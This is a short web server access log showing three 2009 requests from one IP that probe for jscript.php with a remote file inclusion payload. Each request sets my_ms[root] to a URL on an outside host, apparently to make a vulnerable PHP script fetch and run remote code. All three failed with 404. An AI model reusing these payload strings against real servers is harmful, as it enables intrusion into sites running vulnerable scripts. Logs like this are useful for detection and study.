89.171.190.107 - - [14/Nov/2009:01:57:08 -0600] "GET //jscript.php?my_ms[root]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:01:57:08 -0600] "GET /logs//jscript.php?my_ms[root]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:01:57:08 -0600] "GET /logs/access_log.1239494400//jscript.php?my_ms[root]=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
